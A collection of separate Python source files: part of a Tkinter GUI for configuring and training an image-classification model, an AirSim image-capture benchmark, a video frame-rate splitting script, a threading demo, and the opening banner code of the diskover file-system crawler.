width=80,
height=24,
tiny_space=False,
)
# ============================= Group 6 =====================================
self.label_frame_dataset = ttk.Labelframe(
self.parent, text='Sample Dataset'
)
self.below_widget(
src=self.label_frame_dataset,
target=self.label_frame_project,
width=790,
height=170,
tiny_space=True
)
# Attach dataset - button
self.btn_attach_dataset = ttk.Button(
self.parent,
text='Attach Dataset',
command=lambda: self.attach_dataset()
)
self.inside_widget(
src=self.btn_attach_dataset,
target=self.label_frame_dataset,
width=120,
height=24,
)
# Attach dataset - display entry
self.attach_dataset_val = tk.StringVar()
self.attach_dataset_val.set('')
self.attach_dataset_entry = ttk.Entry(
self.parent, textvariable=self.attach_dataset_val, justify=tk.LEFT, state=tk.DISABLED
)
self.next_to_widget(
src=self.attach_dataset_entry,
target=self.btn_attach_dataset,
width=420,
height=24,
tiny_space=True
)
# Validation set count - label
self.validation_num_text = ttk.Label(self.parent, text='Validation Set Num', anchor=tk.W)
self.next_to_widget(
src=self.validation_num_text,
target=self.attach_dataset_entry,
width=120,
height=20,
tiny_space=False,
offset_y=2
)
# Validation set count - entry
self.validation_num_val = tk.IntVar()
self.validation_num_val.set(300)
self.validation_num_entry = ttk.Entry(self.parent, textvariable=self.validation_num_val, justify=tk.LEFT)
self.next_to_widget(
src=self.validation_num_entry,
target=self.validation_num_text,
width=71,
height=20,
tiny_space=True
)
# Training dataset path - label
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Dataset', anchor=tk.W)
self.below_widget(
src=self.dataset_train_path_text,
target=self.btn_attach_dataset,
width=100,
height=20,
tiny_space=False
)
# Training dataset path - listbox
self.dataset_train_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.dataset_train_listbox,
target=self.dataset_train_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_train_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_train_listbox)
)
self.listbox_scrollbar(self.dataset_train_listbox)
# Validation dataset path - label
label_edge = self.object_edge_info(self.dataset_train_path_text)
widget_edge = self.object_edge_info(self.dataset_train_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Dataset', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=100,
height=20
)
# Validation dataset path - listbox
self.dataset_validation_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.dataset_validation_listbox,
target=self.dataset_validation_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_validation_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_validation_listbox)
)
self.listbox_scrollbar(self.dataset_validation_listbox)
self.sample_map = {
DatasetType.Directory: {
RunMode.Trains: self.source_train_path_listbox,
RunMode.Validation: self.source_validation_path_listbox
},
DatasetType.TFRecords: {
RunMode.Trains: self.dataset_train_listbox,
RunMode.Validation: self.dataset_validation_listbox
}
}
# Start training - button
self.btn_training = ttk.Button(self.parent, text='Start Training', command=lambda: self.start_training())
self.widget_from_right(
src=self.btn_training,
target=self.label_frame_dataset,
width=120,
height=24,
tiny_space=True
)
# Stop training - button
self.btn_stop = ttk.Button(self.parent, text='Stop', command=lambda: self.stop_training())
self.button_state(self.btn_stop, tk.DISABLED)
self.before_widget(
src=self.btn_stop,
target=self.btn_training,
width=60,
height=24,
tiny_space=True
)
# Compile model - button
self.btn_compile = ttk.Button(self.parent, text='Compile', command=lambda: self.compile())
self.before_widget(
src=self.btn_compile,
target=self.btn_stop,
width=80,
height=24,
tiny_space=True
)
# Make dataset - button
self.btn_make_dataset = ttk.Button(self.parent, text='Make Dataset', command=lambda: self.make_dataset())
self.before_widget(
src=self.btn_make_dataset,
target=self.btn_compile,
width=120,
height=24,
tiny_space=True
)
# Reset history - button
self.btn_reset_history = ttk.Button(
self.parent, text='Reset History', command=lambda: self.reset_history()
)
self.before_widget(
src=self.btn_reset_history,
target=self.btn_make_dataset,
width=120,
height=24,
tiny_space=True
)
def widget_from_right(self, src, target, width, height, tiny_space=False):
target_edge = self.object_edge_info(target)
src.place(
x=self.window_width - width - self.layout['global']['space']['x'],
y=target_edge['edge_y'] + self.layout['global']['tiny_space' if tiny_space else 'space']['y'],
width=width,
height=height
)
def before_widget(self, src, target, width, height, tiny_space=False):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['x'] - width - self.layout['global']['tiny_space' if tiny_space else 'space']['x'],
y=target_edge['y'],
width=width,
height=height
)
def inside_widget(self, src, target, width, height):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['x'] + self.layout['global']['space']['x'],
y=target_edge['y'] + self.layout['global']['space']['y'],
width=width,
height=height
)
def below_widget(self, src, target, width, height, tiny_space=False):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['x'],
y=target_edge['edge_y'] + self.layout['global']['tiny_space' if tiny_space else 'space']['y'],
width=width,
height=height
)
def next_to_widget(self, src, target, width, height, tiny_space=False, offset_y=0):
target_edge = self.object_edge_info(target)
src.place(
x=target_edge['edge_x'] + self.layout['global']['tiny_space' if tiny_space else 'space']['x'],
y=target_edge['y'] + offset_y,
width=width,
height=height
)
@staticmethod
def threading_exec(func, *args) -> threading.Thread:
th = threading.Thread(target=func, args=args)
th.daemon = True
th.start()
return th
@staticmethod
def object_edge_info(obj):
info = obj.place_info()
x = int(info['x'])
y = int(info['y'])
edge_x = int(info['x']) + int(info['width'])
edge_y = int(info['y']) + int(info['height'])
return {'x': x, 'y': y, 'edge_x': edge_x, 'edge_y': edge_y}
@staticmethod
def listbox_scrollbar(listbox: tk.Listbox):
y_scrollbar = tk.Scrollbar(
listbox, command=listbox.yview
)
y_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
listbox.config(yscrollcommand=y_scrollbar.set)
def blank_click(self, event):
if self.current_project != self.comb_project_name.get():
self.project_name_fill_callback(event)
def project_name_fill_callback(self, event):
suffix = '-{}-{}-H{}-{}-C{}'.format(
self.comb_neu_cnn.get(),
self.comb_recurrent.get(),
self.units_num_spin.get(),
self.comb_loss.get(),
self.comb_channel.get(),
)
current_project_name = self.comb_project_name.get()
if len(current_project_name) > 0 and current_project_name not in self.project_names:
self.sample_map[DatasetType.Directory][RunMode.Trains].delete(0, tk.END)
self.sample_map[DatasetType.Directory][RunMode.Validation].delete(0, tk.END)
if not current_project_name.endswith(suffix):
self.comb_project_name.insert(tk.END, suffix)
self.current_project = self.comb_project_name.get()
self.update_dataset_files_path(mode=RunMode.Trains)
self.update_dataset_files_path(mode=RunMode.Validation)
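# Illustrative note (the enum spellings are assumptions): with e.g. CNN5 /
# BLSTM, 64 hidden units, CTC loss and 3 channels, the generated suffix is
# "-CNN5-BLSTM-H64-CTC-C3", so a project typed as "demo" becomes
# "demo-CNN5-BLSTM-H64-CTC-C3".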
@property
def project_path(self):
if not self.current_project:
return None
project_path = "{}/{}".format(self.project_root_path, self.current_project)
if not os.path.exists(project_path):
os.makedirs(project_path)
return project_path
def update_dataset_files_path(self, mode: RunMode):
dataset_name = "dataset/{}.0.tfrecords".format(mode.value)
dataset_path = os.path.join(self.project_path, dataset_name)
dataset_path = dataset_path.replace("\\", '/')
self.sample_map[DatasetType.TFRecords][mode].delete(0, tk.END)
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, dataset_path)
self.save_conf()
def attach_dataset(self):
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
model_conf = ModelConfig(self.current_project)
if not self.check_dataset(model_conf):
return
self.attach_dataset_val.set(filename)
self.button_state(self.btn_attach_dataset, tk.DISABLED)
for mode in [RunMode.Trains, RunMode.Validation]:
attached_dataset_name = model_conf.dataset_increasing_name(mode)
attached_dataset_name = "dataset/{}".format(attached_dataset_name)
attached_dataset_path = os.path.join(self.project_path, attached_dataset_name)
attached_dataset_path = attached_dataset_path.replace("\\", '/')
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, attached_dataset_path)
self.save_conf()
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=filename,
is_add=True,
callback=lambda: self.button_state(self.btn_attach_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Attach Dataset Status', x)
)
)
@staticmethod
def button_state(btn: ttk.Button, state: str):
btn['state'] = state
def delete_project(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project to delete."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_path = "./projects/{}".format(self.current_project)
try:
shutil.rmtree(project_path)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args)
)
return
messagebox.showinfo(
"Success!", "Delete successful!"
)
self.comb_project_name.delete(0, tk.END)
def reset_history(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_history_path = "./projects/{}/model".format(self.current_project)
try:
shutil.rmtree(project_history_path)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args)
)
return
messagebox.showinfo(
"Success!", "Delete history successful!"
)
def auto_loss(self, event):
if self.comb_recurrent.get() == 'NoRecurrent':
self.comb_loss.set("CrossEntropy")
@staticmethod
def get_param(src: dict, key, default=None):
result = src.get(key)
return result if result else default
def read_conf(self, event):
selected = self.comb_project_name.get()
self.current_project = selected
model_conf = ModelConfig(selected)
self.size_val.set("[{}, {}]".format(model_conf.image_width, model_conf.image_height))
self.resize_val.set(json.dumps(model_conf.resize))
self.source_train_path_listbox.delete(0, tk.END)
self.source_validation_path_listbox.delete(0, tk.END)
self.dataset_validation_listbox.delete(0, tk.END)
self.dataset_train_listbox.delete(0, tk.END)
for source_train in self.get_param(model_conf.trains_path, DatasetType.Directory, default=[]):
self.source_train_path_listbox.insert(tk.END, source_train)
for source_validation in self.get_param(model_conf.validation_path, DatasetType.Directory, default=[]):
self.source_validation_path_listbox.insert(tk.END, source_validation)
self.label_num_spin.set(model_conf.max_label_num)
self.comb_channel.set(model_conf.image_channel)
self.comb_neu_cnn.set(model_conf.neu_cnn_param)
self.comb_recurrent.set(model_conf.neu_recurrent_param)
self.units_num_spin.set(model_conf.units_num)
self.comb_loss.set(model_conf.loss_func_param)
if isinstance(model_conf.category_param, list):
self.category_entry['state'] = tk.NORMAL
self.category_val.set(model_conf.category_param)
else:
self.category_entry['state'] = tk.DISABLED
self.comb_category.set(model_conf.category_param)
self.comb_optimizer.set(model_conf.neu_optimizer_param)
self.learning_rate_spin.set(model_conf.trains_learning_rate)
self.end_acc_val.set(model_conf.trains_end_acc)
self.end_cost_val.set(model_conf.trains_end_cost)
self.end_epochs_spin.set(model_conf.trains_end_epochs)
self.batch_size_val.set(model_conf.batch_size)
self.validation_batch_size_val.set(model_conf.validation_batch_size)
self.binaryzation_val.set(model_conf.binaryzation)
self.median_blur_val.set(model_conf.median_blur)
self.gaussian_blur_val.set(model_conf.gaussian_blur)
if model_conf.equalize_hist:
self.equalize_hist_val.set(1)
if model_conf.laplace:
self.laplace_val.set(1)
if model_conf.warp_perspective:
self.warp_perspective_val.set(1)
self.rotate_val.set(model_conf.rotate)
self.sp_noise_val.set(model_conf.sp_noise)
for dataset_validation in self.get_param(model_conf.validation_path, DatasetType.TFRecords, default=[]):
self.dataset_validation_listbox.insert(tk.END, dataset_validation)
for dataset_train in self.get_param(model_conf.trains_path, DatasetType.TFRecords, default=[]):
self.dataset_train_listbox.insert(tk.END, dataset_train)
return model_conf
@property
def validation_batch_size(self):
if self.dataset_validation_listbox.size() > 1:
return self.validation_batch_size_val.get()
else:
return min(self.validation_batch_size_val.get(), self.validation_num_val.get())
def save_conf(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(
project_name=self.current_project,
MemoryUsage=0.7,
CNNNetwork=self.neu_cnn,
RecurrentNetwork=self.neu_recurrent,
UnitsNum=self.units_num_spin.get(),
Optimizer=self.optimizer,
LossFunction=self.loss_func,
Decoder=self.comb_loss.get(),
ModelName=self.current_project,
ModelField=ModelField.Image.value,
ModelScene=ModelScene.Classification.value,
Category=self.category,
Resize=self.resize,
ImageChannel=self.comb_channel.get(),
ImageWidth=self.image_width,
ImageHeight=self.image_height,
MaxLabelNum=self.label_num_spin.get(),
ReplaceTransparent=False,
HorizontalStitching=False,
OutputSplit='',
LabelFrom=LabelFrom.FileName.value,
ExtractRegex='.*?(?=_)',
LabelSplit='',
DatasetTrainsPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Trains
),
DatasetValidationPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Validation
),
SourceTrainPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Trains
),
SourceValidationPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Validation
),
ValidationSetNum=self.validation_num_val.get(),
SavedSteps=100,
ValidationSteps=500,
EndAcc=self.end_acc_val.get(),
EndCost=self.end_cost_val.get(),
EndEpochs=self.end_epochs_spin.get(),
BatchSize=self.batch_size_val.get(),
ValidationBatchSize=self.validation_batch_size,
LearningRate=self.learning_rate_spin.get(),
Binaryzation=self.binaryzation_val.get(),
MedianBlur=self.median_blur_val.get(),
GaussianBlur=self.gaussian_blur_val.get(),
EqualizeHist=self.equalize_hist_val.get(),
Laplace=self.laplace_val.get(),
WarpPerspective=self.warp_perspective_val.get(),
Rotate=self.rotate_val.get(),
PepperNoise=self.sp_noise_val.get(),
)
model_conf.update()
return model_conf
def make_dataset(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
self.save_conf()
self.button_state(self.btn_make_dataset, tk.DISABLED)
model_conf = ModelConfig(self.current_project)
train_path = self.dataset_value(DatasetType.Directory, RunMode.Trains)
validation_path = self.dataset_value(DatasetType.Directory, RunMode.Validation)
if len(train_path) < 1:
messagebox.showerror(
"Error!", "{} Sample set has not been added.".format(RunMode.Trains.value)
)
self.button_state(self.btn_make_dataset, tk.NORMAL)
return
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=train_path,
validation_path=validation_path,
is_add=False,
callback=lambda: self.button_state(self.btn_make_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Make Dataset Status', x)
)
)
@property
def size(self):
return self.json_filter(self.size_val.get(), int)
@property
def image_height(self):
return self.size[1]
@property
def image_width(self):
return self.size[0]
@property
def resize(self):
return self.json_filter(self.resize_val.get(), int)
@property
def neu_cnn(self):
return self.comb_neu_cnn.get()
@property
def neu_recurrent(self):
return self.comb_recurrent.get()
@property
def loss_func(self):
return self.comb_loss.get()
@property
def optimizer(self):
return self.comb_optimizer.get()
@staticmethod
def json_filter(content, item_type):
if not content:
messagebox.showerror(
"Error!", "To select a customized category, you must specify the category set manually."
)
return None
try:
content = json.loads(content)
except ValueError as e:
messagebox.showerror(
"Error!", "Input must be of type JSON."
)
return None
content = [item_type(i) for i in content]
return content
@property
def category(self):
comb_selected = self.comb_category.get()
if not comb_selected:
messagebox.showerror(
"Error!", "Please select built-in category or custom category first"
)
return None
if comb_selected == 'CUSTOMIZED':
category_value = self.category_entry.get()
category_value = self.json_filter(category_value, str)
else:
category_value = comb_selected
return category_value
def dataset_value(self, dataset_type: DatasetType, mode: RunMode):
listbox = self.sample_map[dataset_type][mode]
value = list(listbox.get(0, listbox.size() - 1))
return value
def compile_task(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(project_name=self.current_project)
if not os.path.exists(model_conf.model_root_path):
messagebox.showerror(
"Error", "Model storage folder does not exist."
)
return
if len(os.listdir(model_conf.model_root_path)) < 3:
messagebox.showerror(
"Error", "There is no training model record, please train before compiling."
)
return
try:
self.current_task = Trains(model_conf)
self.current_task.compile_graph(0)
status = 'Compile completed'
except Exception as e:
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args)
)
status = 'Compile failure'
tk.messagebox.showinfo('Compile Status', status)
def compile(self):
self.job = self.threading_exec(
lambda: self.compile_task()
)
def training_task(self):
model_conf = ModelConfig(project_name=self.current_project)
self.current_task = Trains(model_conf)
try:
self.button_state(self.btn_training, tk.DISABLED)
self.button_state(self.btn_stop, tk.NORMAL)
self.is_task_running = True
self.current_task.train_process()
status = 'Training completed'
except Exception as e:
traceback.print_exc()
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args)
)
status = 'Training failure'
self.button_state(self.btn_training, tk.NORMAL)
self.button_state(self.btn_stop, tk.DISABLED)
self.is_task_running = False
tk.messagebox.showinfo('Training Status', status)
@staticmethod
def check_dataset(model_conf):
trains_path = model_conf.trains_path[DatasetType.TFRecords]
validation_path = model_conf.validation_path[DatasetType.TFRecords]
if not trains_path or not validation_path:
messagebox.showerror(
"Error!", "Training set or validation set not defined."
)
return False
for tp in trains_path:
if not os.path.exists(tp):
messagebox.showerror(
"Error!", "Training set path does not exist, please make dataset first"
)
return False
for vp in validation_path:
if not os.path.exists(vp):
messagebox.showerror(
"Error!", "Validation set path does not exist, please make dataset first"
)
return False
return True
def start_training(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = self.save_conf()
if not self.check_dataset(model_conf):
return
self.job = self.threading_exec(
lambda: self.training_task()
)
def stop_training(self):
self.current_task.stop_flag = True
self.button_state(self.btn_training, tk.NORMAL)
@property
def project_names(self):
return os.listdir(self.project_root_path)
def fetch_projects(self):
self.comb_project_name['values'] = self.project_names
def browse_dataset(self, dataset_type: DatasetType, mode: RunMode):
if not self.current_project:
messagebox.showerror(
"Error!", "Please define the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
self.sample_map[dataset_type][mode].insert(tk.END, filename)
self.fetch_sample([filename])
@staticmethod
def closest_category(category):
category = set(category)
category_group = dict()
for key in SIMPLE_CATEGORY_MODEL.keys():
category_set = set(category_extract(key))
if category <= category_set:
category_group[key] = len(category_set) - len(category)
min_index = min(category_group.values())
for k, v in category_group.items():
if v == min_index:
return k
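# Illustrative sketch (the key names are assumptions): if the sampled labels
# are {'a', 'b', '1'} and SIMPLE_CATEGORY_MODEL offers both ALPHANUMERIC and
# ALPHANUMERIC_LOWER, closest_category picks ALPHANUMERIC_LOWER, the smallest
# built-in set that still covers every observed character.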
def fetch_sample(self, dataset_path):
file_names = os.listdir(dataset_path[0])[0:100]
category = list()
len_label = -1
for file_name in file_names:
if "_" in file_name:
label = file_name.split("_")[0]
label = [i for i in label]
len_label = len(label)
category.extend(label)
category_pram = self.closest_category(category)
self.comb_category.set(category_pram)
size = PilImage.open(os.path.join(dataset_path[0], file_names[0])).size
self.size_val.set(json.dumps(size))
self.resize_val.set(json.dumps(size))
self.label_num_spin.set(len_label)
@staticmethod
def listbox_delete_item_callback(event, listbox: tk.Listbox):
i = listbox.curselection()[0]
listbox.delete(i)
print(i)
def comb_category_callback(self, event):
comb_selected = self.comb_category.get()
if comb_selected == 'CUSTOMIZED':
self.category_entry['state'] = tk.NORMAL
else:
self.category_entry.delete(0, tk.END)
self.category_entry['state'] = tk.DISABLED
@staticmethod
def resource_path(relative_path):
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except AttributeError:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
if __name__ == '__main__':
root = tk.Tk()
app = Wizard(root)
root.mainloop()
|
image_benchmarker.py
|
#!/usr/bin/env python
from argparse import ArgumentParser
from msgpackrpc.error import RPCError
import airsim
import time
import threading
import numpy as np
import cv2
class ImageBenchmarker():
def __init__(self,
img_benchmark_type = 'simGetImage',
viz_image_cv2 = False):
self.airsim_client = airsim.VehicleClient()
self.airsim_client.confirmConnection()
self.image_benchmark_num_images = 0
self.image_benchmark_total_time = 0.0
self.image_callback_thread = None
self.viz_image_cv2 = viz_image_cv2
if img_benchmark_type == "simGetImage":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImage, 0.05))
if img_benchmark_type == "simGetImages":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImages, 0.05))
self.is_image_thread_active = False
def start_img_benchmark_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started img image_callback thread")
def stop_img_benchmark_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def repeat_timer_img(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
    def print_benchmark_results(self):
        if self.image_benchmark_num_images == 0:
            print("no images were captured, nothing to report")
            return
        avg_fps = 1.0 / (self.image_benchmark_total_time / float(self.image_benchmark_num_images))
        print("result: {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
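    # Worked example for the avg_fps math above: 300 images with 10.0 s of
    # cumulative request time -> avg_fps = 1.0 / (10.0 / 300) = 30.0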
def image_callback_benchmark_simGetImage(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
image = self.airsim_client.simGetImage("fpv_cam", airsim.ImageType.Scene)
np_arr = np.frombuffer(image, dtype=np.uint8)
img_rgb = np_arr.reshape(240, 512, 4)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print("result: {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
        # visualize image if enabled via --enable_viz_image_cv2
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
def image_callback_benchmark_simGetImages(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
try:
response = self.airsim_client.simGetImages(request)
np_arr = np.frombuffer(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = np_arr.reshape(response[0].height, response[0].width, 4)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
            print("result: {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
            # visualize image if enabled via --enable_viz_image_cv2
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
except RPCError as e:
print("%s" % str(e))
print("Are your camera name & vehicle name correct?")
def main(args):
baseline_racer = ImageBenchmarker(img_benchmark_type=args.img_benchmark_type, viz_image_cv2=args.viz_image_cv2)
baseline_racer.start_img_benchmark_thread()
time.sleep(30)
baseline_racer.stop_img_benchmark_thread()
baseline_racer.print_benchmark_results()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--img_benchmark_type', type=str, choices=["simGetImage", "simGetImages"], default="simGetImages")
parser.add_argument('--enable_viz_image_cv2', dest='viz_image_cv2', action='store_true', default=False)
args = parser.parse_args()
main(args)
|
video_transformer.py
|
import os
import cv2
import numpy as np
import argparse
import shutil
import multiprocessing
from tqdm import tqdm
# command line parser
parser = argparse.ArgumentParser()
parser.add_argument('--videos_folder', type=str, required=True, help='the path to video dataset folder.')
parser.add_argument('--output_folder', type=str, default='../pre_dataset/', help='the path to output dataset folder.')
parser.add_argument('--lower_rate', type=int, default=5, help='lower the video fps by n times.')
args = parser.parse_args()
class DataCreator(object):
def __init__(self):
self.videos_folder = args.videos_folder
self.output_folder = args.output_folder
self.lower_rate = args.lower_rate
self.tmp = '../.tmp/'
        os.makedirs(self.tmp, exist_ok=True)
def _listener(self, pbar, q):
for item in iter(q.get, None):
pbar.update(1)
def _lower_fps(self, p_args):
video_name, q = p_args
# pbar.set_description("Processing %s" % video_name)
# read a video and create video_writer for lower fps video output
video = cv2.VideoCapture(os.path.join(self.videos_folder, video_name))
fps = video.get(cv2.CAP_PROP_FPS)
size = (int(video.get(cv2.CAP_PROP_FRAME_WIDTH)), int(video.get(cv2.CAP_PROP_FRAME_HEIGHT)))
# fourcc = cv2.VideoWriter_fourcc(*'XVID')
fourcc = cv2.VideoWriter_fourcc(*"mp4v")
video_writer = [cv2.VideoWriter(self.tmp + video_name[:-4] + '_%s' % str(i) + '.mp4',
fourcc,
fps / self.lower_rate,
size)
for i in range(self.lower_rate)]
count = 0
while video.isOpened():
ret, frame = video.read()
if ret:
video_writer[count % self.lower_rate].write(frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
raise KeyboardInterrupt
else:
break
count += 1
for i in range(self.lower_rate):
video_writer[i].release()
q.put(1)
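    # Round-robin split (sketch of the logic above): frame i is written to
    # output (i % lower_rate), so lower_rate=5 turns one 30 fps clip into five
    # 6 fps clips; output 0 gets frames 0, 5, 10, ... and output 1 gets
    # frames 1, 6, 11, ...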
def lower_fps(self):
videos_name = os.listdir(self.videos_folder)
pbar = tqdm(total=len(videos_name))
m = multiprocessing.Manager()
q = m.Queue()
listener = multiprocessing.Process(target=self._listener, args=(pbar, q))
listener.start()
p_args = [(video_name, q) for video_name in videos_name]
pool = multiprocessing.Pool()
pool.map(self._lower_fps, p_args)
pool.close()
pool.join()
q.put(None)
listener.join()
    def output(self):
        # copy the re-timed clips out of the temp folder, then remove it
        os.makedirs(self.output_folder, exist_ok=True)
        for name in os.listdir(self.tmp):
            shutil.copy(os.path.join(self.tmp, name), self.output_folder)
        shutil.rmtree(self.tmp)
if __name__ == '__main__':
data_creator = DataCreator()
data_creator.lower_fps()
data_creator.output()
|
mtsleepC.py
|
#!/usr/bin/env python
import threading
from time import sleep, ctime
loops = [4,2]
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target = loop, args = (i, loops[i]))
threads.append(t)
for i in nloops:
        threads[i].start()  # start threads
for i in nloops:
        threads[i].join()  # wait for all threads to finish
print('all DONE at : ', ctime())
if __name__ == '__main__':
main()
|
diskover.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that indexes
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2019
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from scandir import scandir
from rq import SimpleWorker, Queue
from rq.registry import StartedJobRegistry
from datetime import datetime
from random import randint
try:
import configparser as ConfigParser
except ImportError:
import ConfigParser
from multiprocessing import cpu_count
from threading import Thread, Lock
try:
from queue import Queue as PyQueue
except ImportError:
from Queue import Queue as PyQueue
import progressbar
import argparse
import logging
import importlib
import time
import math
import re
import os
import sys
import json
version = '1.5.0.9'
__version__ = version
IS_PY3 = sys.version_info >= (3, 0)
def print_banner(version):
"""This is the print banner function.
It prints a random banner.
"""
c = randint(1, 4)
if c == 1:
color = '31m'
elif c == 2:
color = '32m'
elif c == 3:
color = '33m'
elif c == 4:
color = '35m'
b = randint(1, 4)
if b == 1:
banner = """\033[%s
________ .__ __
\______ \ |__| _____| | _________ __ ___________
| | \| |/ ___/ |/ / _ \ \/ // __ \_ __ \\ /)___(\\
| ` \ |\___ \| < <_> ) /\ ___/| | \/ (='.'=)
/_______ /__/____ >__|_ \____/ \_/ \___ >__| (\\")_(\\")
\/ \/ \/ \/
v%s
https://shirosaidev.github.io/diskover
Crawling all your stuff.
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
elif b == 2:
banner = """\033[%s
___ ___ ___ ___ ___ ___ ___ ___
/\ \ /\ \ /\ \ /\__\ /\ \ /\__\ /\ \ /\ \\
/::\ \ _\:\ \ /::\ \ /:/ _/_ /::\ \ /:/ _/_ /::\ \ /::\ \\
/:/\:\__\ /\/::\__\ /\:\:\__\ /::-"\__\ /:/\:\__\ |::L/\__\ /::\:\__\ /::\:\__\\
\:\/:/ / \::/\/__/ \:\:\/__/ \;:;-",-" \:\/:/ / |::::/ / \:\:\/ / \;:::/ /
\::/ / \:\__\ \::/ / |:| | \::/ / L;;/__/ \:\/ / |:\/__/
\/__/ \/__/ \/__/ \|__| \/__/ \/__/ \|__|
v%s
https://shirosaidev.github.io/diskover
Bringing light to the darkness.
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
elif b == 3:
banner = """\033[%s
_/_/_/ _/ _/
_/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/_/ _/ _/_/
_/ _/ _/ _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/
_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/
_/_/_/ _/ _/_/_/ _/ _/ _/_/ _/ _/_/_/ _/
v%s
https://shirosaidev.github.io/diskover
"I didn't even know that was there."
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
elif b == 4:
banner = """\033[%s
__ __
/\ \ __ /\ \\
\_\ \/\_\ ____\ \ \/'\\ ___ __ __ __ _ __ //
/'_` \/\ \ /',__\\\ \ , < / __`\/\ \/\ \ /'__`\/\`'__\\ ('>
/\ \L\ \ \ \/\__, `\\\ \ \\\`\ /\ \L\ \ \ \_/ |/\ __/\ \ \/ /rr
\ \___,_\ \_\/\____/ \ \_\ \_\ \____/\ \___/ \ \____\\\ \\_\\ *\))_
\/__,_ /\/_/\/___/ \/_/\/_/\/___/ \/__/ \/____/ \\/_/
v%s
https://shirosaidev.github.io/diskover
"Holy s*i# there are so many temp files."
Support diskover on Patreon or PayPal :)\033[0m
""" % (color, version)
sys.stdout.write(banner)
